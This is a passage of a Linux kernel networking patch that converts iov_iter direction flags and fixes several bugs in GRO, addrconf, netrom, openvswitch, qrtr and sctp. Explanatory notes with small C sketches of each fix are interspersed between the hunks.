+index cc8ff81a50b7f..3009028c4fa28 100644
+--- a/net/ceph/messenger_v2.c
++++ b/net/ceph/messenger_v2.c
+@@ -168,7 +168,7 @@ static int do_try_sendpage(struct socket *sock, struct iov_iter *it)
+ 						  bv.bv_offset, bv.bv_len,
+ 						  CEPH_MSG_FLAGS);
+ 		} else {
+-			iov_iter_bvec(&msg.msg_iter, WRITE, &bv, 1, bv.bv_len);
++			iov_iter_bvec(&msg.msg_iter, ITER_SOURCE, &bv, 1, bv.bv_len);
+ 			ret = sock_sendmsg(sock, &msg);
+ 		}
+ 		if (ret <= 0) {
+@@ -225,7 +225,7 @@ static void reset_in_kvecs(struct ceph_connection *con)
+ 	WARN_ON(iov_iter_count(&con->v2.in_iter));
+ 
+ 	con->v2.in_kvec_cnt = 0;
+-	iov_iter_kvec(&con->v2.in_iter, READ, con->v2.in_kvecs, 0, 0);
++	iov_iter_kvec(&con->v2.in_iter, ITER_DEST, con->v2.in_kvecs, 0, 0);
+ }
+ 
+ static void set_in_bvec(struct ceph_connection *con, const struct bio_vec *bv)
+@@ -233,7 +233,7 @@ static void set_in_bvec(struct ceph_connection *con, const struct bio_vec *bv)
+ 	WARN_ON(iov_iter_count(&con->v2.in_iter));
+ 
+ 	con->v2.in_bvec = *bv;
+-	iov_iter_bvec(&con->v2.in_iter, READ, &con->v2.in_bvec, 1, bv->bv_len);
++	iov_iter_bvec(&con->v2.in_iter, ITER_DEST, &con->v2.in_bvec, 1, bv->bv_len);
+ }
+ 
+ static void set_in_skip(struct ceph_connection *con, int len)
+@@ -241,7 +241,7 @@ static void set_in_skip(struct ceph_connection *con, int len)
+ 	WARN_ON(iov_iter_count(&con->v2.in_iter));
+ 
+ 	dout("%s con %p len %d\n", __func__, con, len);
+-	iov_iter_discard(&con->v2.in_iter, READ, len);
++	iov_iter_discard(&con->v2.in_iter, ITER_DEST, len);
+ }
+ 
+ static void add_out_kvec(struct ceph_connection *con, void *buf, int len)
+@@ -265,7 +265,7 @@ static void reset_out_kvecs(struct ceph_connection *con)
+ 
+ 	con->v2.out_kvec_cnt = 0;
+ 
+-	iov_iter_kvec(&con->v2.out_iter, WRITE, con->v2.out_kvecs, 0, 0);
++	iov_iter_kvec(&con->v2.out_iter, ITER_SOURCE, con->v2.out_kvecs, 0, 0);
+ 	con->v2.out_iter_sendpage = false;
+ }
+ 
+@@ -277,7 +277,7 @@ static void set_out_bvec(struct ceph_connection *con, const struct bio_vec *bv,
+ 
+ 	con->v2.out_bvec = *bv;
+ 	con->v2.out_iter_sendpage = zerocopy;
+-	iov_iter_bvec(&con->v2.out_iter, WRITE, &con->v2.out_bvec, 1,
++	iov_iter_bvec(&con->v2.out_iter, ITER_SOURCE, &con->v2.out_bvec, 1,
+ 		      con->v2.out_bvec.bv_len);
+ }
+ 
+@@ -290,7 +290,7 @@ static void set_out_bvec_zero(struct ceph_connection *con)
+ 	con->v2.out_bvec.bv_offset = 0;
+ 	con->v2.out_bvec.bv_len = min(con->v2.out_zero, (int)PAGE_SIZE);
+ 	con->v2.out_iter_sendpage = true;
+-	iov_iter_bvec(&con->v2.out_iter, WRITE, &con->v2.out_bvec, 1,
++	iov_iter_bvec(&con->v2.out_iter, ITER_SOURCE, &con->v2.out_bvec, 1,
+ 		      con->v2.out_bvec.bv_len);
+ }
+ 
+diff --git a/net/compat.c b/net/compat.c
+index 385f04a6be2f7..161b7bea1f620 100644
+--- a/net/compat.c
++++ b/net/compat.c
+@@ -95,7 +95,8 @@ int get_compat_msghdr(struct msghdr *kmsg,
+ 	if (err)
+ 		return err;
+ 
+-	err = import_iovec(save_addr ? READ : WRITE, compat_ptr(msg.msg_iov), msg.msg_iovlen,
++	err = import_iovec(save_addr ? ITER_DEST : ITER_SOURCE,
++			   compat_ptr(msg.msg_iov), msg.msg_iovlen,
+ 			   UIO_FASTIOV, iov, &kmsg->msg_iter);
+ 	return err < 0 ? err : 0;
+ }
+diff --git a/net/core/gro.c b/net/core/gro.c
+index 1b4abfb9a7a13..352f966cb1dac 100644
+--- a/net/core/gro.c
++++ b/net/core/gro.c
+@@ -162,6 +162,15 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
+ 	struct sk_buff *lp;
+ 	int segs;
+ 
++	/* Do not splice page pool based packets w/ non-page pool
++	 * packets. This can result in reference count issues as page
++	 * pool pages will not decrement the reference count and will
++	 * instead be immediately returned to the pool or have frag
++	 * count decremented.
++	 */
++	if (p->pp_recycle != skb->pp_recycle)
++		return -ETOOMANYREFS;
++
+ 	/* pairs with WRITE_ONCE() in netif_set_gro_max_size() */
+ 	gro_max_size = READ_ONCE(p->dev->gro_max_size);
+ 
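
As the comment in the hunk explains, GRO must not splice frags from a page-pool skb into a non-page-pool one (or vice versa), since the two use different reference-counting schemes; returning -ETOOMANYREFS makes the stack fall back to delivering the packets separately. A trivial sketch of the guard, with a one-bit stand-in for the skb flag:

    #include <errno.h>
    #include <stdio.h>

    struct skb { unsigned int pp_recycle : 1; };

    static int gro_merge(const struct skb *p, const struct skb *skb)
    {
        if (p->pp_recycle != skb->pp_recycle)
            return -ETOOMANYREFS;  /* refuse: fall back to normal receive */
        return 0;                  /* same allocator: safe to splice frags */
    }

    int main(void)
    {
        struct skb pool = { 1 }, slab = { 0 };

        printf("pool+slab: %d\n", gro_merge(&pool, &slab));  /* -ETOOMANYREFS */
        printf("pool+pool: %d\n", gro_merge(&pool, &pool));  /* 0 */
        return 0;
    }
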
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index ec19ed7224536..6667c3538f2ab 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -2001,7 +2001,7 @@ static int receive_fallback_to_copy(struct sock *sk,
+ 	if (copy_address != zc->copybuf_address)
+ 		return -EINVAL;
+ 
+-	err = import_single_range(READ, (void __user *)copy_address,
++	err = import_single_range(ITER_DEST, (void __user *)copy_address,
+ 				  inq, &iov, &msg.msg_iter);
+ 	if (err)
+ 		return err;
+@@ -2035,7 +2035,7 @@ static int tcp_copy_straggler_data(struct tcp_zerocopy_receive *zc,
+ 	if (copy_address != zc->copybuf_address)
+ 		return -EINVAL;
+ 
+-	err = import_single_range(READ, (void __user *)copy_address,
++	err = import_single_range(ITER_DEST, (void __user *)copy_address,
+ 				  copylen, &iov, &msg.msg_iter);
+ 	if (err)
+ 		return err;
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index 94aad3870c5fc..cf26d65ca3893 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -6,6 +6,7 @@
+ #include <linux/bpf.h>
+ #include <linux/init.h>
+ #include <linux/wait.h>
++#include <linux/util_macros.h>
+ 
+ #include <net/inet_common.h>
+ #include <net/tls.h>
+@@ -639,10 +640,9 @@ EXPORT_SYMBOL_GPL(tcp_bpf_update_proto);
+  */
+ void tcp_bpf_clone(const struct sock *sk, struct sock *newsk)
+ {
+-	int family = sk->sk_family == AF_INET6 ? TCP_BPF_IPV6 : TCP_BPF_IPV4;
+ 	struct proto *prot = newsk->sk_prot;
+ 
+-	if (prot == &tcp_bpf_prots[family][TCP_BPF_BASE])
++	if (is_insidevar(prot, tcp_bpf_prots))
+ 		newsk->sk_prot = sk->sk_prot_creator;
+ }
+ #endif /* CONFIG_BPF_SYSCALL */
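+
+[The tcp_bpf_clone() fix above stops comparing against one specific array slot and instead asks whether the prot pointer lands anywhere inside the tcp_bpf_prots table, via is_insidevar() from the newly included <linux/util_macros.h>. A standalone sketch of that idea; the _toy names are illustrative and the real macro's exact spelling may differ:
+
+#include <stdint.h>
+#include <stdio.h>
+
+#define is_insidevar_toy(ptr, var)                                \
+	((uintptr_t)(ptr) >= (uintptr_t)&(var) &&                 \
+	 (uintptr_t)(ptr) <  (uintptr_t)&(var) + sizeof(var))
+
+static int tcp_bpf_prots_toy[2][4];	/* stand-in for the 2-D prot table */
+
+int main(void)
+{
+	int *inside = &tcp_bpf_prots_toy[1][2];
+	int outside;
+
+	printf("inside:  %d\n", is_insidevar_toy(inside, tcp_bpf_prots_toy));
+	printf("outside: %d\n", is_insidevar_toy(&outside, tcp_bpf_prots_toy));
+	return 0;
+}
+
+Checking the whole table means the restore-on-clone logic keeps working even when the child socket points at a different family/variant entry than the one computed from sk->sk_family.]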
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 9c3f5202a97ba..e6c7edcf68343 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -3127,17 +3127,17 @@ static void add_v4_addrs(struct inet6_dev *idev)
+ 		offset = sizeof(struct in6_addr) - 4;
+ 	memcpy(&addr.s6_addr32[3], idev->dev->dev_addr + offset, 4);
+ 
+-	if (idev->dev->flags&IFF_POINTOPOINT) {
++	if (!(idev->dev->flags & IFF_POINTOPOINT) && idev->dev->type == ARPHRD_SIT) {
++		scope = IPV6_ADDR_COMPATv4;
++		plen = 96;
++		pflags |= RTF_NONEXTHOP;
++	} else {
+ 		if (idev->cnf.addr_gen_mode == IN6_ADDR_GEN_MODE_NONE)
+ 			return;
+ 
+ 		addr.s6_addr32[0] = htonl(0xfe800000);
+ 		scope = IFA_LINK;
+ 		plen = 64;
+-	} else {
+-		scope = IPV6_ADDR_COMPATv4;
+-		plen = 96;
+-		pflags |= RTF_NONEXTHOP;
+ 	}
+ 
+ 	if (addr.s6_addr32[3]) {
+@@ -3447,6 +3447,30 @@ static void addrconf_gre_config(struct net_device *dev)
+ }
+ #endif
+ 
++static void addrconf_init_auto_addrs(struct net_device *dev)
++{
++	switch (dev->type) {
++#if IS_ENABLED(CONFIG_IPV6_SIT)
++	case ARPHRD_SIT:
++		addrconf_sit_config(dev);
++		break;
++#endif
++#if IS_ENABLED(CONFIG_NET_IPGRE) || IS_ENABLED(CONFIG_IPV6_GRE)
++	case ARPHRD_IP6GRE:
++	case ARPHRD_IPGRE:
++		addrconf_gre_config(dev);
++		break;
++#endif
++	case ARPHRD_LOOPBACK:
++		init_loopback(dev);
++		break;
++
++	default:
++		addrconf_dev_config(dev);
++		break;
++	}
++}
++
+ static int fixup_permanent_addr(struct net *net,
+ 				struct inet6_dev *idev,
+ 				struct inet6_ifaddr *ifp)
+@@ -3615,26 +3639,7 @@ static int addrconf_notify(struct notifier_block *this, unsigned long event,
+ 			run_pending = 1;
+ 		}
+ 
+-		switch (dev->type) {
+-#if IS_ENABLED(CONFIG_IPV6_SIT)
+-		case ARPHRD_SIT:
+-			addrconf_sit_config(dev);
+-			break;
+-#endif
+-#if IS_ENABLED(CONFIG_NET_IPGRE) || IS_ENABLED(CONFIG_IPV6_GRE)
+-		case ARPHRD_IP6GRE:
+-		case ARPHRD_IPGRE:
+-			addrconf_gre_config(dev);
+-			break;
+-#endif
+-		case ARPHRD_LOOPBACK:
+-			init_loopback(dev);
+-			break;
+-
+-		default:
+-			addrconf_dev_config(dev);
+-			break;
+-		}
++		addrconf_init_auto_addrs(dev);
+ 
+ 		if (!IS_ERR_OR_NULL(idev)) {
+ 			if (run_pending)
+@@ -6397,7 +6402,7 @@ static int addrconf_sysctl_addr_gen_mode(struct ctl_table *ctl, int write,
+ 
+ 			if (idev->cnf.addr_gen_mode != new_val) {
+ 				idev->cnf.addr_gen_mode = new_val;
+-				addrconf_dev_config(idev->dev);
++				addrconf_init_auto_addrs(idev->dev);
+ 			}
+ 		} else if (&net->ipv6.devconf_all->addr_gen_mode == ctl->data) {
+ 			struct net_device *dev;
+@@ -6408,7 +6413,7 @@ static int addrconf_sysctl_addr_gen_mode(struct ctl_table *ctl, int write,
+ 				if (idev &&
+ 				    idev->cnf.addr_gen_mode != new_val) {
+ 					idev->cnf.addr_gen_mode = new_val;
+-					addrconf_dev_config(idev->dev);
++					addrconf_init_auto_addrs(idev->dev);
+ 				}
+ 			}
+ 		}
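+
+[The addrconf change above is a factoring fix: the per-device-type dispatch that used to live only in the netdev notifier moves into addrconf_init_auto_addrs(), so the addr_gen_mode sysctl handler regenerates addresses through the same path instead of unconditionally calling addrconf_dev_config(), which mishandles SIT, GRE and loopback devices. A tiny sketch of the shape of the refactor, with invented names:
+
+#include <stdio.h>
+
+enum dev_type_toy { DEV_SIT, DEV_GRE, DEV_LOOPBACK, DEV_OTHER };
+
+/* one helper, called from both the notifier and the sysctl paths */
+static void init_auto_addrs_toy(enum dev_type_toy t)
+{
+	switch (t) {
+	case DEV_SIT:
+		printf("sit-specific config\n");
+		break;
+	case DEV_GRE:
+		printf("gre-specific config\n");
+		break;
+	case DEV_LOOPBACK:
+		printf("loopback config\n");
+		break;
+	default:
+		printf("generic config\n");
+		break;
+	}
+}
+
+int main(void)
+{
+	init_auto_addrs_toy(DEV_SIT);	/* the sysctl path no longer gets this wrong */
+	init_auto_addrs_toy(DEV_OTHER);
+	return 0;
+}]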
+diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
+index a56fd0b5a430a..4963fec815da3 100644
+--- a/net/netfilter/ipvs/ip_vs_sync.c
++++ b/net/netfilter/ipvs/ip_vs_sync.c
+@@ -1617,7 +1617,7 @@ ip_vs_receive(struct socket *sock, char *buffer, const size_t buflen)
+ 	EnterFunction(7);
+ 
+ 	/* Receive a packet */
+-	iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, buflen);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, buflen);
+ 	len = sock_recvmsg(sock, &msg, MSG_DONTWAIT);
+ 	if (len < 0)
+ 		return len;
+diff --git a/net/netrom/af_netrom.c b/net/netrom/af_netrom.c
+index 6f7f4392cffb1..5a4cb796150f5 100644
+--- a/net/netrom/af_netrom.c
++++ b/net/netrom/af_netrom.c
+@@ -400,6 +400,11 @@ static int nr_listen(struct socket *sock, int backlog)
+ 	struct sock *sk = sock->sk;
+ 
+ 	lock_sock(sk);
++	if (sock->state != SS_UNCONNECTED) {
++		release_sock(sk);
++		return -EINVAL;
++	}
++
+ 	if (sk->sk_state != TCP_LISTEN) {
+ 		memset(&nr_sk(sk)->user_addr, 0, AX25_ADDR_LEN);
+ 		sk->sk_max_ack_backlog = backlog;
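+
+[The netrom hunk above (and the matching x25_listen change further down) closes a race by rejecting listen() on a socket whose state is no longer SS_UNCONNECTED, returning -EINVAL under the socket lock. A userspace-style sketch of the guard, using toy types and invented names:
+
+#include <errno.h>
+#include <stdio.h>
+
+enum sock_state { SS_UNCONNECTED, SS_CONNECTING, SS_CONNECTED };
+
+struct toy_sock { enum sock_state state; int backlog; };
+
+static int toy_listen(struct toy_sock *s, int backlog)
+{
+	if (s->state != SS_UNCONNECTED)
+		return -EINVAL;		/* the check both hunks add */
+	s->backlog = backlog;
+	return 0;
+}
+
+int main(void)
+{
+	struct toy_sock a = { .state = SS_UNCONNECTED };
+	struct toy_sock b = { .state = SS_CONNECTED };
+
+	printf("unconnected: %d\n", toy_listen(&a, 8));	/* 0 */
+	printf("connected:   %d\n", toy_listen(&b, 8));	/* -22 */
+	return 0;
+}]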
+diff --git a/net/openvswitch/datapath.c b/net/openvswitch/datapath.c
+index fa0f1952d7637..5920fdca12875 100644
+--- a/net/openvswitch/datapath.c
++++ b/net/openvswitch/datapath.c
+@@ -979,14 +979,14 @@ static int ovs_flow_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 	key = kzalloc(sizeof(*key), GFP_KERNEL);
+ 	if (!key) {
+ 		error = -ENOMEM;
+-		goto err_kfree_key;
++		goto err_kfree_flow;
+ 	}
+ 
+ 	ovs_match_init(&match, key, false, &mask);
+ 	error = ovs_nla_get_match(net, &match, a[OVS_FLOW_ATTR_KEY],
+ 				  a[OVS_FLOW_ATTR_MASK], log);
+ 	if (error)
+-		goto err_kfree_flow;
++		goto err_kfree_key;
+ 
+ 	ovs_flow_mask_key(&new_flow->key, key, true, &mask);
+ 
+@@ -994,14 +994,14 @@ static int ovs_flow_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 	error = ovs_nla_get_identifier(&new_flow->id, a[OVS_FLOW_ATTR_UFID],
+ 				       key, log);
+ 	if (error)
+-		goto err_kfree_flow;
++		goto err_kfree_key;
+ 
+ 	/* Validate actions. */
+ 	error = ovs_nla_copy_actions(net, a[OVS_FLOW_ATTR_ACTIONS],
+ 				     &new_flow->key, &acts, log);
+ 	if (error) {
+ 		OVS_NLERR(log, "Flow actions may not be safe on all matching packets.");
+-		goto err_kfree_flow;
++		goto err_kfree_key;
+ 	}
+ 
+ 	reply = ovs_flow_cmd_alloc_info(acts, &new_flow->id, info, false,
+@@ -1101,10 +1101,10 @@ err_unlock_ovs:
+ 	kfree_skb(reply);
+ err_kfree_acts:
+ 	ovs_nla_free_flow_actions(acts);
+-err_kfree_flow:
+-	ovs_flow_free(new_flow, false);
+ err_kfree_key:
+ 	kfree(key);
++err_kfree_flow:
++	ovs_flow_free(new_flow, false);
+ error:
+ 	return error;
+ }
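+
+[The openvswitch hunks above are a classic goto-unwind fix: error labels must release resources in the reverse order they were acquired, so failures after the key allocation need to jump to the label that frees the key first, which then falls through to freeing the flow. A self-contained sketch of the convention, simplified, with malloc/free standing in for the kernel allocators:
+
+#include <stdio.h>
+#include <stdlib.h>
+
+/* validate_fails injects a late failure so the unwind path runs */
+static int build_flow_toy(int validate_fails)
+{
+	char *flow, *key;
+	int err = -1;
+
+	flow = malloc(32);		/* acquired first */
+	if (!flow)
+		goto out;
+
+	key = malloc(16);		/* acquired second */
+	if (!key)
+		goto err_free_flow;
+
+	if (validate_fails)		/* late failure: undo both */
+		goto err_free_key;
+
+	free(key);			/* normal teardown on success */
+	free(flow);
+	return 0;
+
+err_free_key:				/* unwind in reverse acquisition order */
+	free(key);
+err_free_flow:
+	free(flow);
+out:
+	return err;
+}
+
+int main(void)
+{
+	printf("success:      %d\n", build_flow_toy(0));
+	printf("late failure: %d\n", build_flow_toy(1));
+	return 0;
+}
+
+Before the fix, the labels were stacked the other way around, so a key-parsing failure freed the flow but leaked the key.]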
+diff --git a/net/qrtr/ns.c b/net/qrtr/ns.c
+index 1990d496fcfc0..e595079c2cafe 100644
+--- a/net/qrtr/ns.c
++++ b/net/qrtr/ns.c
+@@ -83,7 +83,10 @@ static struct qrtr_node *node_get(unsigned int node_id)
+ 
+ 	node->id = node_id;
+ 
+-	radix_tree_insert(&nodes, node_id, node);
++	if (radix_tree_insert(&nodes, node_id, node)) {
++		kfree(node);
++		return NULL;
++	}
+ 
+ 	return node;
+ }
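+
+[The qrtr hunk above stops ignoring radix_tree_insert()'s return value: if the insert fails (duplicate id or allocation failure), the freshly allocated node was previously leaked. A sketch of the pattern with a toy index; index_insert and the other names are invented:
+
+#include <stdio.h>
+#include <stdlib.h>
+
+struct node { unsigned int id; };
+
+/* toy stand-in for radix_tree_insert(): fails on duplicates or overflow */
+static int index_insert(unsigned int id)
+{
+	static unsigned int seen[8];
+	static int n;
+
+	for (int i = 0; i < n; i++)
+		if (seen[i] == id)
+			return -17;	/* -EEXIST */
+	if (n == 8)
+		return -12;		/* -ENOMEM */
+	seen[n++] = id;
+	return 0;
+}
+
+static struct node *node_get_toy(unsigned int id)
+{
+	struct node *node = malloc(sizeof(*node));
+
+	if (!node)
+		return NULL;
+	node->id = id;
+	if (index_insert(id)) {		/* result was previously ignored */
+		free(node);		/* without this, node leaked */
+		return NULL;
+	}
+	return node;
+}
+
+int main(void)
+{
+	struct node *a = node_get_toy(1);
+	struct node *b = node_get_toy(1);	/* duplicate: NULL, no leak */
+
+	printf("first: %p, duplicate: %p\n", (void *)a, (void *)b);
+	free(a);
+	return 0;
+}]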
+diff --git a/net/sctp/transport.c b/net/sctp/transport.c
+index f8fd98784977a..b3f1a91e9a079 100644
+--- a/net/sctp/transport.c
++++ b/net/sctp/transport.c
+@@ -196,9 +196,7 @@ void sctp_transport_reset_hb_timer(struct sctp_transport *transport)
+ 
+ 	/* When a data chunk is sent, reset the heartbeat interval.  */
+ 	expires = jiffies + sctp_transport_timeout(transport);
+-	if ((time_before(transport->hb_timer.expires, expires) ||
+-	     !timer_pending(&transport->hb_timer)) &&
+-	    !mod_timer(&transport->hb_timer,
++	if (!mod_timer(&transport->hb_timer,
+ 		       expires + prandom_u32_max(transport->rto)))
+ 		sctp_transport_hold(transport);
+ }
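+
+[The sctp change above leans on mod_timer()'s return value: it returns 0 when the timer was inactive and nonzero when it merely rearmed a pending timer, so the transport reference is taken exactly once per activation and the hand-rolled time_before()/timer_pending() preconditions can go. A toy model of that contract; names are invented and the real mod_timer() carries more semantics:
+
+#include <stdbool.h>
+#include <stdio.h>
+
+struct toy_timer { bool pending; unsigned long expires; };
+
+/* returns 0 if the timer was inactive, 1 if it was already pending */
+static int mod_timer_toy(struct toy_timer *t, unsigned long expires)
+{
+	int was_pending = t->pending;
+
+	t->pending = true;
+	t->expires = expires;
+	return was_pending;
+}
+
+static int holds;	/* stands in for the transport refcount */
+
+static void reset_hb_timer_toy(struct toy_timer *t, unsigned long expires)
+{
+	if (!mod_timer_toy(t, expires))
+		holds++;	/* take a hold only on fresh activation */
+}
+
+int main(void)
+{
+	struct toy_timer t = { 0 };
+
+	reset_hb_timer_toy(&t, 100);	/* activates: takes a hold */
+	reset_hb_timer_toy(&t, 200);	/* rearms: no extra hold */
+	printf("holds = %d (expect 1)\n", holds);
+	return 0;
+}]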
+diff --git a/net/smc/smc_clc.c b/net/smc/smc_clc.c
+index 1472f31480d8b..dfb9797f7bc63 100644
+--- a/net/smc/smc_clc.c
++++ b/net/smc/smc_clc.c
+@@ -673,7 +673,7 @@ int smc_clc_wait_msg(struct smc_sock *smc, void *buf, int buflen,
+ 	 */
+ 	krflags = MSG_PEEK | MSG_WAITALL;
+ 	clc_sk->sk_rcvtimeo = timeout;
+-	iov_iter_kvec(&msg.msg_iter, READ, &vec, 1,
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &vec, 1,
+ 			sizeof(struct smc_clc_msg_hdr));
+ 	len = sock_recvmsg(smc->clcsock, &msg, krflags);
+ 	if (signal_pending(current)) {
+@@ -720,7 +720,7 @@ int smc_clc_wait_msg(struct smc_sock *smc, void *buf, int buflen,
+ 	} else {
+ 		recvlen = datlen;
+ 	}
+-	iov_iter_kvec(&msg.msg_iter, READ, &vec, 1, recvlen);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &vec, 1, recvlen);
+ 	krflags = MSG_WAITALL;
+ 	len = sock_recvmsg(smc->clcsock, &msg, krflags);
+ 	if (len < recvlen || !smc_clc_msg_hdr_valid(clcm, check_trl)) {
+@@ -737,7 +737,7 @@ int smc_clc_wait_msg(struct smc_sock *smc, void *buf, int buflen,
+ 		/* receive remaining proposal message */
+ 		recvlen = datlen > SMC_CLC_RECV_BUF_LEN ?
+ 						SMC_CLC_RECV_BUF_LEN : datlen;
+-		iov_iter_kvec(&msg.msg_iter, READ, &vec, 1, recvlen);
++		iov_iter_kvec(&msg.msg_iter, ITER_DEST, &vec, 1, recvlen);
+ 		len = sock_recvmsg(smc->clcsock, &msg, krflags);
+ 		datlen -= len;
+ 	}
+diff --git a/net/smc/smc_tx.c b/net/smc/smc_tx.c
+index 64dedffe9d269..f4b6a71ac488a 100644
+--- a/net/smc/smc_tx.c
++++ b/net/smc/smc_tx.c
+@@ -308,7 +308,7 @@ int smc_tx_sendpage(struct smc_sock *smc, struct page *page, int offset,
+ 
+ 	iov.iov_base = kaddr + offset;
+ 	iov.iov_len = size;
+-	iov_iter_kvec(&msg.msg_iter, WRITE, &iov, 1, size);
++	iov_iter_kvec(&msg.msg_iter, ITER_SOURCE, &iov, 1, size);
+ 	rc = smc_tx_sendmsg(smc, &msg, size);
+ 	kunmap(page);
+ 	return rc;
+diff --git a/net/socket.c b/net/socket.c
+index 00da9ce3dba0b..73463c7c3702b 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -750,7 +750,7 @@ EXPORT_SYMBOL(sock_sendmsg);
+ int kernel_sendmsg(struct socket *sock, struct msghdr *msg,
+ 		   struct kvec *vec, size_t num, size_t size)
+ {
+-	iov_iter_kvec(&msg->msg_iter, WRITE, vec, num, size);
++	iov_iter_kvec(&msg->msg_iter, ITER_SOURCE, vec, num, size);
+ 	return sock_sendmsg(sock, msg);
+ }
+ EXPORT_SYMBOL(kernel_sendmsg);
+@@ -776,7 +776,7 @@ int kernel_sendmsg_locked(struct sock *sk, struct msghdr *msg,
+ 	if (!sock->ops->sendmsg_locked)
+ 		return sock_no_sendmsg_locked(sk, msg, size);
+ 
+-	iov_iter_kvec(&msg->msg_iter, WRITE, vec, num, size);
++	iov_iter_kvec(&msg->msg_iter, ITER_SOURCE, vec, num, size);
+ 
+ 	return sock->ops->sendmsg_locked(sk, msg, msg_data_left(msg));
+ }
+@@ -1034,7 +1034,7 @@ int kernel_recvmsg(struct socket *sock, struct msghdr *msg,
+ 		   struct kvec *vec, size_t num, size_t size, int flags)
+ {
+ 	msg->msg_control_is_user = false;
+-	iov_iter_kvec(&msg->msg_iter, READ, vec, num, size);
++	iov_iter_kvec(&msg->msg_iter, ITER_DEST, vec, num, size);
+ 	return sock_recvmsg(sock, msg, flags);
+ }
+ EXPORT_SYMBOL(kernel_recvmsg);
+@@ -2092,7 +2092,7 @@ int __sys_sendto(int fd, void __user *buff, size_t len, unsigned int flags,
+ 	struct iovec iov;
+ 	int fput_needed;
+ 
+-	err = import_single_range(WRITE, buff, len, &iov, &msg.msg_iter);
++	err = import_single_range(ITER_SOURCE, buff, len, &iov, &msg.msg_iter);
+ 	if (unlikely(err))
+ 		return err;
+ 	sock = sockfd_lookup_light(fd, &err, &fput_needed);
+@@ -2157,7 +2157,7 @@ int __sys_recvfrom(int fd, void __user *ubuf, size_t size, unsigned int flags,
+ 	int err, err2;
+ 	int fput_needed;
+ 
+-	err = import_single_range(READ, ubuf, size, &iov, &msg.msg_iter);
++	err = import_single_range(ITER_DEST, ubuf, size, &iov, &msg.msg_iter);
+ 	if (unlikely(err))
+ 		return err;
+ 	sock = sockfd_lookup_light(fd, &err, &fput_needed);
+@@ -2417,7 +2417,7 @@ static int copy_msghdr_from_user(struct msghdr *kmsg,
+ 	if (err)
+ 		return err;
+ 
+-	err = import_iovec(save_addr ? READ : WRITE,
++	err = import_iovec(save_addr ? ITER_DEST : ITER_SOURCE,
+ 			    msg.msg_iov, msg.msg_iovlen,
+ 			    UIO_FASTIOV, iov, &kmsg->msg_iter);
+ 	return err < 0 ? err : 0;
+diff --git a/net/sunrpc/socklib.c b/net/sunrpc/socklib.c
+index 71ba4cf513bce..1b2b84feeec69 100644
+--- a/net/sunrpc/socklib.c
++++ b/net/sunrpc/socklib.c
+@@ -214,14 +214,14 @@ static inline int xprt_sendmsg(struct socket *sock, struct msghdr *msg,
+ static int xprt_send_kvec(struct socket *sock, struct msghdr *msg,
+ 			  struct kvec *vec, size_t seek)
+ {
+-	iov_iter_kvec(&msg->msg_iter, WRITE, vec, 1, vec->iov_len);
++	iov_iter_kvec(&msg->msg_iter, ITER_SOURCE, vec, 1, vec->iov_len);
+ 	return xprt_sendmsg(sock, msg, seek);
+ }
+ 
+ static int xprt_send_pagedata(struct socket *sock, struct msghdr *msg,
+ 			      struct xdr_buf *xdr, size_t base)
+ {
+-	iov_iter_bvec(&msg->msg_iter, WRITE, xdr->bvec, xdr_buf_pagecount(xdr),
++	iov_iter_bvec(&msg->msg_iter, ITER_SOURCE, xdr->bvec, xdr_buf_pagecount(xdr),
+ 		      xdr->page_len + xdr->page_base);
+ 	return xprt_sendmsg(sock, msg, base + xdr->page_base);
+ }
+@@ -244,7 +244,7 @@ static int xprt_send_rm_and_kvec(struct socket *sock, struct msghdr *msg,
+ 	};
+ 	size_t len = iov[0].iov_len + iov[1].iov_len;
+ 
+-	iov_iter_kvec(&msg->msg_iter, WRITE, iov, 2, len);
++	iov_iter_kvec(&msg->msg_iter, ITER_SOURCE, iov, 2, len);
+ 	return xprt_sendmsg(sock, msg, base);
+ }
+ 
+diff --git a/net/sunrpc/svcsock.c b/net/sunrpc/svcsock.c
+index e833103f46291..815baf308236a 100644
+--- a/net/sunrpc/svcsock.c
++++ b/net/sunrpc/svcsock.c
+@@ -260,7 +260,7 @@ static ssize_t svc_tcp_read_msg(struct svc_rqst *rqstp, size_t buflen,
+ 	rqstp->rq_respages = &rqstp->rq_pages[i];
+ 	rqstp->rq_next_page = rqstp->rq_respages + 1;
+ 
+-	iov_iter_bvec(&msg.msg_iter, READ, bvec, i, buflen);
++	iov_iter_bvec(&msg.msg_iter, ITER_DEST, bvec, i, buflen);
+ 	if (seek) {
+ 		iov_iter_advance(&msg.msg_iter, seek);
+ 		buflen -= seek;
+@@ -874,7 +874,7 @@ static ssize_t svc_tcp_read_marker(struct svc_sock *svsk,
+ 		want = sizeof(rpc_fraghdr) - svsk->sk_tcplen;
+ 		iov.iov_base = ((char *)&svsk->sk_marker) + svsk->sk_tcplen;
+ 		iov.iov_len  = want;
+-		iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, want);
++		iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, want);
+ 		len = sock_recvmsg(svsk->sk_sock, &msg, MSG_DONTWAIT);
+ 		if (len < 0)
+ 			return len;
+diff --git a/net/sunrpc/xprtsock.c b/net/sunrpc/xprtsock.c
+index 915b9902f673b..b3ab6d9d752ea 100644
+--- a/net/sunrpc/xprtsock.c
++++ b/net/sunrpc/xprtsock.c
+@@ -364,7 +364,7 @@ static ssize_t
+ xs_read_kvec(struct socket *sock, struct msghdr *msg, int flags,
+ 		struct kvec *kvec, size_t count, size_t seek)
+ {
+-	iov_iter_kvec(&msg->msg_iter, READ, kvec, 1, count);
++	iov_iter_kvec(&msg->msg_iter, ITER_DEST, kvec, 1, count);
